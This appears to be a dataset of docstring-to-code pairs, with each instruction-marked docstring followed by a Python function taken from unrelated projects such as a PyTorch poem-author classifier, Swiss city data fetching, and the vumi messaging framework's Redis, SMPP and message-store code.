[/INST] def model_fn(model_dir): + print("Loading model.") + model_info = {} + model_info_path = os.path.join(model_dir, 'model_info.pth') + with open(model_info_path, 'rb') as f: + model_info = torch.load(f) + print("model_info: {}".format(model_info)) + device = torch.device("cuda" if torch.cuda.is_available() else "cpu") + INPUT_DIM = model_info['INPUT_DIM'] + WORD_EMBEDDING_DIM = model_info['WORD_EMBEDDING_DIM'] + N_FILTERS = model_info['N_FILTERS'] + FILTER_SIZES = model_info['FILTER_SIZES'] + AUTHOR_DIM = model_info['AUTHOR_DIM'] + DROPOUT = model_info['DROPOUT'] + PAD_IDX = model_info['PAD_IDX'] + model = CNN(INPUT_DIM, WORD_EMBEDDING_DIM, N_FILTERS, FILTER_SIZES, AUTHOR_DIM, DROPOUT, PAD_IDX) + print("Model loaded with embedding_dim {}, vocab_size {}.".format( + WORD_EMBEDDING_DIM, INPUT_DIM)) + model_path = os.path.join(model_dir, 'model_state.pt') + with open(model_path, 'rb') as f: + model.load_state_dict(torch.load(f)) + word_dict_path = os.path.join(model_dir, 'word_dict.pkl') + with open(word_dict_path, 'rb') as f: + model.word_dict = pickle.load(f) + model.to(device).eval() + print("Done loading model.") + return model +[INST] ls list to be cut/padded to length n. [/INST] def pad_to_n(ls, n = FIX_WORD_LENGTH): + ls= ls[:n] + if len(ls) < n: + ls = (['<pad>']*(n-len(ls))) + ls + return ls +[INST] Gets word length of a poem, +if larger than SPLIT_INTO partitions into next paragraph +return author, title and poem broken in this way. [/INST] def poem_fragments(poem_series, split_into): + poem = poem_series + poem_author = poem.author + poem_title = poem.title + poem_content = poem.content + poem_pa= poem.content.split('.\n') + i=0 + while ((i+1)!=(len(poem_pa))): + if (len(poem_pa[i].split())>=split_into): + poem_pa[i]=poem_pa[i]+'.\n' + i+=1 + else: + poem_pa[i] = poem_pa[i]+'.\n'+poem_pa[i+1] + del poem_pa[i+1] + return (poem_author, poem_title ,poem_pa) +[INST] ls list to be cut/padded to length n. [/INST] def slice_and_pad_to_n(ls, n): + ls= ls[:n] + if len(ls) < n: + ls = (['<pad>']*(n-len(ls))) + ls + return ls +[INST] List to tokens +word_dict: dictionary of tokens +token_list: word list. [/INST] def tokenize_poem(token_list, word_dict): + aux = [word_dict[w] if w in word_dict else word_dict['<unk>'] for w in token_list] + return aux +[INST] poem extract as list +word_length: final word length of poems +token_dict: tokens dictionary +tokenized_poems: tokenized poems. [/INST] def tokenize_pad_slice_poems(data, word_length, word_dict): + data = [slice_and_pad_to_n(p, word_length) for p in data] + tokenized_poems = [tokenize_poem(p ,word_dict) for p in data] + return tokenized_poems +[INST] data : poems list created by spacy and torchtext +word_length: fix poems to have this number of tokens (not only words) +data_dir: dir to store data +file_name: file name to store data. [/INST] def process_and_save(data, word_length, word_dict, data_dir, file_name): + data_list = [i.content for i in data.examples] + labels_list = [i.author_label for i in data.examples] + poems_list = tokenize_pad_slice_poems(data_list, word_length, word_dict) + path_to_file = os.path.join(data_dir, file_name) + with open(path_to_file, 'wb') as f: + pickle.dump((poems_list,labels_list), f) +[INST] Visualizes coordinates in dataframe on map +Retrieves columns with name latitude and longitude and visualizes it on a map.. 
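A small worked example of the pad/truncate-then-tokenize flow above; the '<pad>' and '<unk>' token names and the toy vocabulary are assumptions made for illustration, since the original markup around the special tokens was stripped.

# Hypothetical vocabulary; indices 0 and 1 are reserved for padding and unknown words.
word_dict = {'<pad>': 0, '<unk>': 1, 'the': 2, 'rose': 3, 'is': 4, 'red': 5}

def slice_and_pad(ls, n):
    ls = ls[:n]
    if len(ls) < n:
        ls = ['<pad>'] * (n - len(ls)) + ls
    return ls

def to_ids(tokens, word_dict):
    return [word_dict[w] if w in word_dict else word_dict['<unk>'] for w in tokens]

words = ['the', 'rose', 'is', 'very', 'red']
padded = slice_and_pad(words, 8)
print(padded)                     # ['<pad>', '<pad>', '<pad>', 'the', 'rose', 'is', 'very', 'red']
print(to_ids(padded, word_dict))  # [0, 0, 0, 2, 3, 4, 1, 5]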
[/INST] def visualize_coordinates(df: pd.DataFrame, latitude: str, longitude: str) -> None : + fig = px.scatter_mapbox(df, lat=latitude, lon=longitude, + color_continuous_scale=px.colors.cyclical.IceFire, size_max=15, zoom=10, + mapbox_style="carto-positron") + fig.show() +[INST] Fetches the data for a city if the data is not yet cashed on the computer.. [/INST] def fetch_data_city(city: str) -> None: + compression = ".xz" + folder = os.path.join(".","data") + def file_path(file_name: str) -> str: + return os.path.join(folder, file_name) + if not(os.path.exists(folder)): + os.mkdir(folder) + tiles_path = file_path(f'{city}Tiles.pkl{compression}') + hourly_dem_path = file_path(f'{city}HourlyDemographics.pkl{compression}') + hourly_density_path = file_path(f'{city}HourlyDensity.pkl{compression}') + daily_density_path = file_path(f'{city}DensityDaily.pkl{compression}') + daily_demographics_path = file_path(f'{city}DemographicsDaily.pkl{compression}') + if not(os.path.isfile(tiles_path)): + tiles = get_tiles(get_municipalityID(city)[0]) + tiles.to_pickle(tiles_path) + else: + tiles = pd.read_pickle(tiles_path) + if not(os.path.isfile(hourly_dem_path)): + hourly_dem = get_hourly_demographics_dataframe(tiles['tileID'].to_numpy()) + hourly_dem.to_pickle(hourly_dem_path) + if not(os.path.isfile(hourly_density_path)): + hourly_dens = get_hourly_density_dataframe(tiles['tileID'].to_numpy()) + hourly_dens.to_pickle(hourly_density_path) + if not(os.path.isfile(daily_density_path)): + get_daily_density(tiles['tileID'].to_numpy()).to_pickle(daily_density_path) + if not(os.path.isfile(daily_demographics_path)): + get_daily_demographics(tiles['tileID'].to_numpy()).to_pickle(daily_demographics_path) +[INST] Cleans the list of cities by removing all the cities that are not found in the +official list of cities provided by the Federal Statisitics Office. + +List of cities to check and clean. + +List containing a subset of the input list such that all elements are valid.. [/INST] def clean_cities_list(cities: [str]) -> [str]: + invalid_cities = [] + for c in cities: + if len(commune.loc[commune.GDENAME == c].GDENR.to_numpy()) == 0: + city = [] + sim_value = [] + for f in commune.GDENAME: + r = SequenceMatcher(None, c, f).ratio() + if r > 0.5: + city.append(f) + sim_value.append(r) + d = pd.DataFrame(data={"city": city, "value": sim_value}) + potential_cities = d.sort_values("value", ascending=False).head(5).city.to_numpy() + print(f"City nammed: {c} cannot be found in official records. Did you mean: {potential_cities} ? {c} will be ignored.") + invalid_cities.append(c) + return [c for c in cities if not(c in invalid_cities)] +[INST] Downloads the excel spreadsheet from the Swiss Federal Statistical Office that maps the town name to unique ID. [/INST] def download_commune_excel() -> None: + print('Beginning commune file download with requests') + folder = os.path.join(".","data") + if not(os.path.exists(folder)): + os.mkdir(folder) + url = 'https://www.bfs.admin.ch/bfsstatic/dam/assets/11467406/master' + r = requests.get(url) + with open(os.path.join(".", "data", 'commune.xlsx'), 'wb') as f: + f.write(r.content) + print("End of commune file download") +[INST] Assert that a redis operation returns the expected result.. [/INST] def assert_redis_op(self, redis, expected, op, *args, **kw): + raise NotImplementedError(".assert_redis_op() method not implemented.") +[INST] Assert that a redis operation raises an exception.. 
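A minimal sketch of the difflib-based fuzzy matching that clean_cities_list above uses to suggest close official names; the candidate list and threshold are illustrative.

from difflib import SequenceMatcher

official_names = ['Zürich', 'Bern', 'Basel', 'Lausanne', 'Winterthur']

def suggest(name, candidates, threshold=0.5, top=3):
    # Score each candidate by similarity ratio and keep the closest ones above the threshold.
    scored = [(c, SequenceMatcher(None, name, c).ratio()) for c in candidates]
    close = [(c, r) for c, r in scored if r > threshold]
    return [c for c, _ in sorted(close, key=lambda x: x[1], reverse=True)[:top]]

print(suggest('Zurich', official_names))  # ['Zürich']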
[/INST] def assert_redis_error(self, redis, op, *args, **kw): + raise NotImplementedError( + ".assert_redis_error() method not implemented.") +[INST] Wait some number of seconds, either for real or by advancing a clock.. [/INST] def wait(self, delay): + raise NotImplementedError(".wait() method not implemented.") +[INST] Perform an operation on both the fake and real Redises and assert that +the responses and errors are the same. + +This method is a generator and is not used directly. It's wrapped +with an appropriate sync/async wrapper in __init__() above.. [/INST] def _perform_operation_gen(self, op, *args, **kw): + results = [] + errors = [] + for redis in [self._fake_redis, self._real_redis]: + try: + result = yield getattr(redis, op)(*args, **kw) + except Exception as e: + errors.append(e) + if results != []: + self._test_case.fail( + "Fake redis returned %r but real redis raised %r" % ( + results[0], errors[0])) + else: + results.append(result) + if errors != []: + self._test_case.fail( + "Real redis returned %r but fake redis raised %r" % ( + results[0], errors[0])) + if errors: + fake_type, real_type = type(errors[0]), type(errors[1]) + if real_type is self._real_redis.RESPONSE_ERROR: + real_type = self._fake_redis.RESPONSE_ERROR + self._test_case.assertEqual( + fake_type, real_type, + ("Fake redis (a) and real redis (b) errors different:" + "\n a = %r\n b = %r") % tuple(errors)) + raise errors[0] + self._test_case.assertEqual( + results[0], results[1], + "Fake redis (a) and real redis (b) responses different:" + "\n a = %r\n b = %r" % tuple(results)) + returnValue(results[0]) +[INST] Check if this might be a delivery report with optional PDU parameters.. [/INST] def _handle_delivery_report_optional_params(self, pdu): + pdu_opts = unpacked_pdu_opts(pdu) + receipted_message_id = pdu_opts.get('receipted_message_id', None) + message_state = pdu_opts.get('message_state', None) + if receipted_message_id is None or message_state is None: + return succeed(False) + status = self.STATUS_MAP.get(message_state, 'UNKNOWN') + d = self.transport.handle_delivery_report( + receipted_message_id=receipted_message_id, + delivery_status=self.delivery_status(status), + smpp_delivery_status=status) + d.addCallback(lambda _: True) + return d +[INST] Construct and dispatch a delivery report based on content fields as +matched by our regex.. [/INST] def _process_delivery_report_content_fields(self, content_fields): + receipted_message_id = content_fields['id'] + message_state = content_fields['stat'] + return self.transport.handle_delivery_report( + receipted_message_id=receipted_message_id, + delivery_status=self.delivery_status(message_state), + smpp_delivery_status=message_state) +[INST] Check if the ``esm_class`` indicates that this is a delivery report. + +We assume the message content is a string that matches our regex. +We can't use the usual decoding process here because it lives +elsewhere and the content should be plain ASCII generated by the +SMSC anyway.. 
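For context, a sketch of pulling the id and stat fields out of a conventional SMSC delivery-receipt body; both the receipt text and the regex below are purely illustrative, since the actual configurable delivery_report_regex is not shown here.

import re

# Typical short_message body of an SMPP delivery receipt (illustrative).
receipt = ('id:0123456789 sub:001 dlvrd:001 submit date:2301011200 '
           'done date:2301011201 stat:DELIVRD err:000 text:hello')

# Illustrative pattern capturing the two fields the handlers above need: id and stat.
dr_regex = re.compile(r'id:(?P<id>\S+).*\bstat:(?P<stat>[A-Z]+)')
match = dr_regex.search(receipt)
if match:
    fields = match.groupdict()
    print(fields['id'], fields['stat'])  # 0123456789 DELIVRD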
[/INST] def _handle_delivery_report_esm_class(self, pdu): + if not self.config.delivery_report_use_esm_class: + return succeed(False) + esm_class = pdu["body"]["mandatory_parameters"]["esm_class"] + if not (esm_class & self.ESM_CLASS_MASK): + return succeed(False) + content = pdu["body"]["mandatory_parameters"]["short_message"] + match = self.config.delivery_report_regex.search(content or '') + if not match: + self.log.warning( + ("esm_class %s indicates delivery report, but content" + " does not match regex: %r") % (esm_class, content)) + return succeed(True) + fields = match.groupdict() + d = self._process_delivery_report_content_fields(fields) + d.addCallback(lambda _: True) + return d +[INST] Call the appropriate `submit_*` method depending on config.. [/INST] def send_short_message(self, service, vumi_message_id, destination_addr, + content, data_coding=0, source_addr='', + optional_parameters=None): + kwargs = dict( + vumi_message_id=vumi_message_id, + destination_addr=destination_addr, + short_message=content, + data_coding=data_coding, + source_addr=source_addr, + optional_parameters=optional_parameters) + if self.config.send_long_messages: + kwargs['long_message'] = kwargs.pop('short_message') + return service.submit_sm_long(**kwargs) + elif self.config.send_multipart_sar: + kwargs['reference_rollover'] = ( + self.config.multipart_sar_reference_rollover) + return service.submit_csm_sar(**kwargs) + elif self.config.send_multipart_udh: + return service.submit_csm_udh(**kwargs) + return service.submit_sm(**kwargs) +[INST] Decorate a method that calls a manager. +This redecorates with the `call_decorator` attribute on the Manager +subclass used, which should be either @inlineCallbacks or +@flatten_generator.. [/INST] def calls_manager(manager_attr): + if callable(manager_attr): + return Manager.calls_manager('manager')(manager_attr) + def redecorate(func): + @wraps(func) + def wrapper(self, *args, **kw): + manager = getattr(self, manager_attr) + return manager.call_decorator(func)(self, *args, **kw) + return wrapper + return redecorate +[INST] Construct a manager from a dictionary of options.. [/INST] def from_config(cls, config): + client_config = config.copy() + manager_config = { + 'config': config.copy(), + 'key_prefix': client_config.pop('key_prefix', None), + 'key_separator': client_config.pop('key_separator', ':'), + } + fake_redis = client_config.pop('FAKE_REDIS', None) + if 'VUMITEST_REDIS_DB' in os.environ: + fake_redis = None + client_config['db'] = int(os.environ['VUMITEST_REDIS_DB']) + if fake_redis is not None: + if isinstance(fake_redis, cls): + fake_redis = fake_redis._client + if isinstance(fake_redis, FakeRedis): + pass + else: + fake_redis = None + return cls._fake_manager(fake_redis, manager_config) + return cls._manager_from_config(client_config, manager_config) +[INST] Construct a client from a dictionary of options.. [/INST] def _manager_from_config(cls, client_config, manager_config): + raise NotImplementedError("Sub-classes of Manager should implement" + " ._manager_from_config(...)") +[INST] Delete *ALL* keys whose names start with this manager's key prefix. +Use only in tests.. [/INST] def _purge_all(self): + raise NotImplementedError("Sub-classes of Manager should implement" + " ._purge_all()") +[INST] Make a redis API call using the underlying client library.. [/INST] def _make_redis_call(self, call, *args, **kw): + raise NotImplementedError("Sub-classes of Manager should implement" + " ._make_redis_call()") +[INST] Filter results of a redis call.. 
[/INST] def _filter_redis_results(self, func, results): + raise NotImplementedError("Sub-classes of Manager should implement" + " ._filter_redis_results()") +[INST] Generate a key using this manager's key prefix. [/INST] def _key(self, key): + if self._key_prefix is None: + return key + return "%s%s%s" % (self._key_prefix, self._key_separator, key) +[INST] Strip off manager's key prefix from a key. [/INST] def _unkey(self, key): + prefix = "%s%s" % (self._key_prefix, self._key_separator) + if key.startswith(prefix): + return key[len(prefix):] + return key +[INST] Return the result with some fake delay. If we're in async mode, add +some real delay to catch code that doesn't properly wait for the +deferred to fire.. [/INST] def _delay_operation(self, func, args, kw): + self.clock.advance(0.1) + if self._is_async: + d = Deferred() + delayed = reactor.callLater( + FAKE_REDIS_WAIT, call_to_deferred, d, func, self, *args, **kw) + self._delayed_calls.append(delayed) + return d + else: + return func(self, *args, **kw) +[INST] Sort keys in a consistent but non-obvious way. +We sort by the crc32 of the key, that being cheap and good enough for +our purposes here.. [/INST] def _sort_keys_by_hash(self, keys): + return sorted(keys, key=crc32) +[INST] Turn a vumi_date-formatted string into a string that sorts in reverse order +and can be turned back into a timestamp later. + +This is done by converting to a unix timestamp and subtracting it from +0xffffffffff (2**40 - 1) to get a number well outside the range +representable by the datetime module. The result is returned as a +hexadecimal string.. [/INST] def to_reverse_timestamp(vumi_timestamp): + timestamp = timegm(parse_vumi_date(vumi_timestamp).timetuple()) + return "%X" % (0xffffffffff - timestamp) +[INST] Add a key and timestamp to the manager.. [/INST] def add_key(self, key, timestamp): + if timestamp > self.start_timestamp: + self.new_keys.append((key, timestamp)) + return None + self.cache_keys.append((key, timestamp)) + if len(self.cache_keys) > self.key_count: + return self.cache_keys.pop(0) + return None +[INST] Check if a batch_id's cache values need to be reconciled with +what's stored in the MessageStore.. [/INST] def needs_reconciliation(self, batch_id, delta=0.01): + inbound = float((yield self.batch_inbound_count(batch_id))) + cached_inbound = yield self.cache.count_inbound_message_keys( + batch_id) + if inbound and (abs(cached_inbound - inbound) / inbound) > delta: + returnValue(True) + outbound = float((yield self.batch_outbound_count(batch_id))) + cached_outbound = yield self.cache.count_outbound_message_keys( + batch_id) + if outbound and (abs(cached_outbound - outbound) / outbound) > delta: + returnValue(True) + returnValue(False) +[INST] Rebuild the cache for the given batch. +The ``start_timestamp`` parameter is used for testing only.. [/INST] def reconcile_cache(self, batch_id, start_timestamp=None): + if start_timestamp is None: + start_timestamp = format_vumi_date(datetime.utcnow()) + yield self.cache.clear_batch(batch_id) + yield self.cache.batch_start(batch_id) + yield self.reconcile_outbound_cache(batch_id, start_timestamp) + yield self.reconcile_inbound_cache(batch_id, start_timestamp) +[INST] Rebuild the inbound message cache.. 
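A worked example of ``to_reverse_timestamp`` above, inlined so it runs standalone. The ``YYYY-MM-DD HH:MM:SS`` date format is an assumption about what ``parse_vumi_date`` accepts, and ``from_reverse_timestamp`` is added only to show the round trip:

from calendar import timegm
from datetime import datetime

def to_reverse_timestamp(vumi_timestamp):
    # Same arithmetic as above, with the date parsing inlined.
    timestamp = timegm(datetime.strptime(
        vumi_timestamp[:19], '%Y-%m-%d %H:%M:%S').timetuple())
    return "%X" % (0xffffffffff - timestamp)

def from_reverse_timestamp(reverse_ts):
    # Hypothetical inverse, just to show the value is recoverable.
    return datetime.utcfromtimestamp(0xffffffffff - int(reverse_ts, 16))

earlier = to_reverse_timestamp("2014-01-01 00:00:00")
later = to_reverse_timestamp("2014-01-02 00:00:00")
assert later < earlier                    # newer entries sort first
print(from_reverse_timestamp(earlier))    # 2014-01-01 00:00:00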
[/INST] def reconcile_inbound_cache(self, batch_id, start_timestamp): + key_manager = ReconKeyManager( + start_timestamp, self.cache.TRUNCATE_MESSAGE_KEY_COUNT_AT) + key_count = 0 + index_page = yield self.batch_inbound_keys_with_addresses(batch_id) + while index_page is not None: + for key, timestamp, addr in index_page: + yield self.cache.add_from_addr(batch_id, addr) + old_key = key_manager.add_key(key, timestamp) + if old_key is not None: + key_count += 1 + index_page = yield index_page.next_page() + yield self.cache.add_inbound_message_count(batch_id, key_count) + for key, timestamp in key_manager: + try: + yield self.cache.add_inbound_message_key( + batch_id, key, self.cache.get_timestamp(timestamp)) + except: + log.err() +[INST] Rebuild the outbound message cache.. [/INST] def reconcile_outbound_cache(self, batch_id, start_timestamp): + key_manager = ReconKeyManager( + start_timestamp, self.cache.TRUNCATE_MESSAGE_KEY_COUNT_AT) + key_count = 0 + status_counts = defaultdict(int) + index_page = yield self.batch_outbound_keys_with_addresses(batch_id) + while index_page is not None: + for key, timestamp, addr in index_page: + yield self.cache.add_to_addr(batch_id, addr) + old_key = key_manager.add_key(key, timestamp) + if old_key is not None: + key_count += 1 + sc = yield self.get_event_counts(old_key[0]) + for status, count in sc.iteritems(): + status_counts[status] += count + index_page = yield index_page.next_page() + yield self.cache.add_outbound_message_count(batch_id, key_count) + for status, count in status_counts.iteritems(): + yield self.cache.add_event_count(batch_id, status, count) + for key, timestamp in key_manager: + try: + yield self.cache.add_outbound_message_key( + batch_id, key, self.cache.get_timestamp(timestamp)) + yield self.reconcile_event_cache(batch_id, key) + except: + log.err() +[INST] Update the event cache for a particular message.. [/INST] def reconcile_event_cache(self, batch_id, message_id): + event_keys = yield self.message_event_keys(message_id) + for event_key in event_keys: + event = yield self.get_event(event_key) + yield self.cache.add_event(batch_id, event) +[INST] Has the message search issue a `batch_inbound_keys_matching()` +query and stores the resulting keys in the cache ordered by +descending timestamp.. [/INST] def find_inbound_keys_matching(self, batch_id, query, ttl=None, + wait=False): + assert isinstance(self.manager, TxRiakManager), ( + "manager is not an instance of TxRiakManager") + token = yield self.cache.start_query(batch_id, 'inbound', query) + deferred = self.batch_inbound_keys_matching(batch_id, query) + deferred.addCallback( + lambda keys: self.cache.store_query_results(batch_id, token, keys, + 'inbound', ttl)) + if wait: + yield deferred + returnValue(token) +[INST] Has the message search issue a `batch_outbound_keys_matching()` +query and stores the resulting keys in the cache ordered by +descending timestamp.. [/INST] def find_outbound_keys_matching(self, batch_id, query, ttl=None, + wait=False): + token = yield self.cache.start_query(batch_id, 'outbound', query) + deferred = self.batch_outbound_keys_matching(batch_id, query) + deferred.addCallback( + lambda keys: self.cache.store_query_results(batch_id, token, keys, + 'outbound', ttl)) + if wait: + yield deferred + returnValue(token) +[INST] Count the number of keys in the token's result set.. 
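The reconcile and stats methods above all follow the same paging loop: consume every entry on the current page, then fetch the next one until ``next_page()`` returns ``None``. A generic sketch of that loop, assuming ``first_page`` is one of the ``IndexPageWrapper`` results returned by the ``batch_*_with_addresses`` methods:

from twisted.internet.defer import inlineCallbacks, maybeDeferred, returnValue

@inlineCallbacks
def walk_index_pages(first_page, handle_entry):
    """Process every entry on every page; handle_entry may return a
    Deferred (e.g. a cache update) or a plain value."""
    page = first_page
    total = 0
    while page is not None:
        for entry in page:            # e.g. (key, timestamp, addr) tuples
            yield maybeDeferred(handle_entry, entry)
            total += 1
        page = yield page.next_page()
    returnValue(total)

# Usage (inside inlineCallbacks, names assumed):
#   page = yield store.batch_inbound_keys_with_addresses(batch_id)
#   count = yield walk_index_pages(
#       page, lambda (key, ts, addr): cache.add_from_addr(batch_id, addr))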
[/INST] def count_keys_for_token(self, batch_id, token): + return self.cache.count_query_results(batch_id, token) +[INST] Return True or False depending on whether or not the query is +still running. [/INST] def is_query_in_progress(self, batch_id, token): + return self.cache.is_query_in_progress(batch_id, token) +[INST] Return all inbound message keys with (and ordered by) timestamps.. [/INST] def batch_inbound_keys_with_timestamps(self, batch_id, max_results=None, + start=None, end=None, + with_timestamps=True): + formatter = key_with_ts_only_formatter if with_timestamps else None + return self._query_batch_index( + self.inbound_messages, batch_id, 'batches_with_addresses', + max_results, start, end, formatter) +[INST] Return all outbound message keys with (and ordered by) timestamps.. [/INST] def batch_outbound_keys_with_timestamps(self, batch_id, max_results=None, + start=None, end=None, + with_timestamps=True): + formatter = key_with_ts_only_formatter if with_timestamps else None + return self._query_batch_index( + self.outbound_messages, batch_id, 'batches_with_addresses', + max_results, start, end, formatter) +[INST] Return all inbound message keys with (and ordered by) timestamps and +addresses.. [/INST] def batch_inbound_keys_with_addresses(self, batch_id, max_results=None, + start=None, end=None): + return self._query_batch_index( + self.inbound_messages, batch_id, 'batches_with_addresses', + max_results, start, end, key_with_ts_and_value_formatter) +[INST] Return all outbound message keys with (and ordered by) timestamps and +addresses.. [/INST] def batch_outbound_keys_with_addresses(self, batch_id, max_results=None, + start=None, end=None): + return self._query_batch_index( + self.outbound_messages, batch_id, 'batches_with_addresses', + max_results, start, end, key_with_ts_and_value_formatter) +[INST] Return all inbound message keys with timestamps and addresses. +Results are ordered from newest to oldest.. [/INST] def batch_inbound_keys_with_addresses_reverse(self, batch_id, + max_results=None, + start=None, end=None): + if start is not None: + start = to_reverse_timestamp(start) + if end is not None: + end = to_reverse_timestamp(end) + start, end = end, start + return self._query_batch_index( + self.inbound_messages, batch_id, 'batches_with_addresses_reverse', + max_results, start, end, key_with_rts_and_value_formatter) +[INST] Return all outbound message keys with timestamps and addresses. +Results are ordered from newest to oldest.. [/INST] def batch_outbound_keys_with_addresses_reverse(self, batch_id, + max_results=None, + start=None, end=None): + if start is not None: + start = to_reverse_timestamp(start) + if end is not None: + end = to_reverse_timestamp(end) + start, end = end, start + return self._query_batch_index( + self.outbound_messages, batch_id, 'batches_with_addresses_reverse', + max_results, start, end, key_with_rts_and_value_formatter) +[INST] Return all event keys with timestamps and statuses. +Results are ordered from newest to oldest.. [/INST] def batch_event_keys_with_statuses_reverse(self, batch_id, + max_results=None, + start=None, end=None): + if start is not None: + start = to_reverse_timestamp(start) + if end is not None: + end = to_reverse_timestamp(end) + start, end = end, start + return self._query_batch_index( + self.events, batch_id, 'batches_with_statuses_reverse', + max_results, start, end, key_with_rts_and_value_formatter) +[INST] Return all event keys with (and ordered by) timestamps and statuses.. 
[/INST] def message_event_keys_with_statuses(self, msg_id, max_results=None): + if max_results is None: + max_results = self.DEFAULT_MAX_RESULTS + start_value, end_value = self._start_end_values(msg_id, None, None) + results = yield self.events.index_keys_page( + 'message_with_status', start_value, end_value, + return_terms=True, max_results=max_results) + returnValue(IndexPageWrapper( + key_with_ts_and_value_formatter, self, msg_id, results)) +[INST] Return inbound message stats for the specified time range. +Currently, message stats include total message count and unique address +count.. [/INST] def batch_inbound_stats(self, batch_id, max_results=None, + start=None, end=None): + total = 0 + unique_addresses = set() + start_value, end_value = self._start_end_values(batch_id, start, end) + if max_results is None: + max_results = self.DEFAULT_MAX_RESULTS + raw_page = yield self.inbound_messages.index_keys_page( + 'batches_with_addresses', start_value, end_value, + return_terms=True, max_results=max_results) + page = IndexPageWrapper( + key_with_ts_and_value_formatter, self, batch_id, raw_page) + while page is not None: + results = list(page) + total += len(results) + unique_addresses.update(addr for key, timestamp, addr in results) + page = yield page.next_page() + returnValue({ + "total": total, + "unique_addresses": len(unique_addresses), + }) +[INST] Return outbound message stats for the specified time range. +Currently, message stats include total message count and unique address +count.. [/INST] def batch_outbound_stats(self, batch_id, max_results=None, + start=None, end=None): + total = 0 + unique_addresses = set() + start_value, end_value = self._start_end_values(batch_id, start, end) + if max_results is None: + max_results = self.DEFAULT_MAX_RESULTS + raw_page = yield self.outbound_messages.index_keys_page( + 'batches_with_addresses', start_value, end_value, + return_terms=True, max_results=max_results) + page = IndexPageWrapper( + key_with_ts_and_value_formatter, self, batch_id, raw_page) + while page is not None: + results = list(page) + total += len(results) + unique_addresses.update(addr for key, timestamp, addr in results) + page = yield page.next_page() + returnValue({ + "total": total, + "unique_addresses": len(unique_addresses), + }) +[INST] Wrap a raw index page object if it is not None.. [/INST] def _wrap_index_page(self, index_page): + if index_page is not None: + index_page = type(self)( + self._formatter, self._message_store, self._batch_id, + index_page) + return index_page +[INST] Fetch the next page of results.. [/INST] def next_page(self): + next_page = yield self._index_page.next_page() + returnValue(self._wrap_index_page(next_page)) +[INST] Indicate whether there are more results to follow.. [/INST] def has_next_page(self): + return self._index_page.has_next_page() +[INST] Post-migrate function to be used with `vumi_model_migrator` to add batches +to stored events that don't have any.. [/INST] def add_batches_to_event(stored_event): + if stored_event.batches.keys(): + returnValue(False) + outbound_messages = stored_event.manager.proxy(OutboundMessage) + msg_record = yield outbound_messages.load(stored_event.message.key) + if msg_record is not None: + for batch_id in msg_record.batches.keys(): + stored_event.batches.add_key(batch_id) + returnValue(True) +[INST] Publishes a status if it is not a repeat of the previously +published status.. 
[/INST] def add_status(self, **kw): + if self.status_detect.check_status(**kw): + return self.publish_status(**kw) + return succeed(None) +[INST] Can be overridden by subclasses to do something when the +response time is high enough for the transport to be considered +non-functioning.. [/INST] def on_down_response_time(self, message_id, time): + pass +[INST] Can be overridden by subclasses to do something when the +response time is high enough for the transport to be considered +running in a degraded state.. [/INST] def on_degraded_response_time(self, message_id, time): + pass +[INST] Can be overridden by subclasses to do something when the +response time is low enough for the transport to be considered +running normally.. [/INST] def on_good_response_time(self, message_id, time): + pass +[INST] helper to check whether a config key is defined. Only used for +verifying dict fields in the new-style configs. [/INST] def assert_field(cfg, key): + if key not in cfg: + raise ConfigError("Expected '%s' field in config" % key) +[INST] Compute the number of worker instances running on each host.. [/INST] def _compute_host_info(self, instances): + counts = {} + for ins in instances: + counts[ins.hostname] = 0 + for ins in instances: + counts[ins.hostname] = counts[ins.hostname] + 1 + return counts +[INST] Verify whether enough workers checked in. +Make sure to call snapshot() before running this method. [/INST] def audit(self, storage): + count = len(self._instances) + if (count >= self.min_procs) and (self.procs_count < self.min_procs): + yield storage.delete_worker_issue(self.worker_id) + if count < self.min_procs: + issue = WorkerIssue("min-procs-fail", time.time(), count) + yield storage.open_or_update_issue(self.worker_id, issue) + self.procs_count = count +[INST] This method must be run before any diagnostic audit and analyses +What it does is clear the instances_active set in preparation for +all the instances which will check-in in the next interval. + +All diagnostics are based on the _instances_active set, which +holds all the instances which checked-in the previous interval.. [/INST] def snapshot(self): + self._instances = self._instances_active + self._instances_active = set() +[INST] Parse configuration and populate in-memory state. [/INST] def parse_config(self, config): + systems = [] + workers = {} + for sys in config.values(): + assert_field(sys, 'workers') + assert_field(sys, 'system_id') + system_id = sys['system_id'] + system_workers = [] + for wkr_entry in sys['workers'].values(): + assert_field(wkr_entry, 'name') + assert_field(wkr_entry, 'min_procs') + worker_name = wkr_entry['name'] + min_procs = wkr_entry['min_procs'] + wkr = Worker(system_id, + worker_name, + min_procs) + workers[wkr.worker_id] = wkr + system_workers.append(wkr) + systems.append(System(system_id, system_id, system_workers)) + return systems, workers +[INST] Iterate over worker instance sets and check to see whether any have not +checked-in on time. + +We call snapshot() first, since the execution of tasks here is +interleaved with the processing of worker heartbeat messages.. [/INST] def _periodic_task(self): + for wkr in self._workers.values(): + wkr.snapshot() + for wkr in self._workers.values(): + yield wkr.audit(self._storage) + yield self._sync_to_storage() +[INST] Create a timer task to check for missing worker. 
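An illustrative configuration for ``parse_config`` above, shaped the way the ``assert_field`` checks imply: a mapping of systems, each carrying a ``system_id`` and a ``workers`` mapping whose entries have ``name`` and ``min_procs``. The outer key names are placeholders, not a documented layout:

monitor_config = {
    'vumi_system': {
        'system_id': 'vumi-production',
        'workers': {
            'sms_transport': {
                'name': 'sms_transport',
                'min_procs': 2,   # a "min-procs-fail" issue opens below this
            },
            'hangman_app': {
                'name': 'hangman_app',
                'min_procs': 1,
            },
        },
    },
}

# systems, workers = monitor.parse_config(monitor_config)
# gives one System and a Worker per entry, each with its min_procs threshold.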
[/INST] def _start_task(self): + self._task = LoopingCall(self._periodic_task) + self._task_done = self._task.start(self.deadline, now=False) + errfn = lambda failure: log.err(failure, + "Heartbeat verify: timer task died") + self._task_done.addErrback(errfn) +[INST] Find vumi message ids associated with SMPP sequence numbers.. [/INST] def lookup_message_ids(self, service, seq_nums): + lookup_func = service.message_stash.get_sequence_number_message_id + return gatherResults([lookup_func(seq_num) for seq_num in seq_nums]) +[INST] Clean-up of setup done in setup_application should happen here.. [/INST] def teardown_application(self): + pass +[INST] Respond to a new session. +Defaults to calling consume_user_message.. [/INST] def new_session(self, message): + return self.consume_user_message(message) +[INST] Close a session. +The .reply_to() method should not be called when the session is closed.. [/INST] def close_session(self, message): + pass +[INST] Check that endpoint is in the list of allowed endpoints.. [/INST] def check_endpoint(allowed_endpoints, endpoint): + if allowed_endpoints is None: + return + if endpoint is None: + endpoint = "default" + if endpoint not in allowed_endpoints: + raise InvalidEndpoint( + "Endpoint %r not defined in list of allowed endpoints %r" + % (endpoint, allowed_endpoints)) +[INST] Make an AST node with the relevant bits attached.. 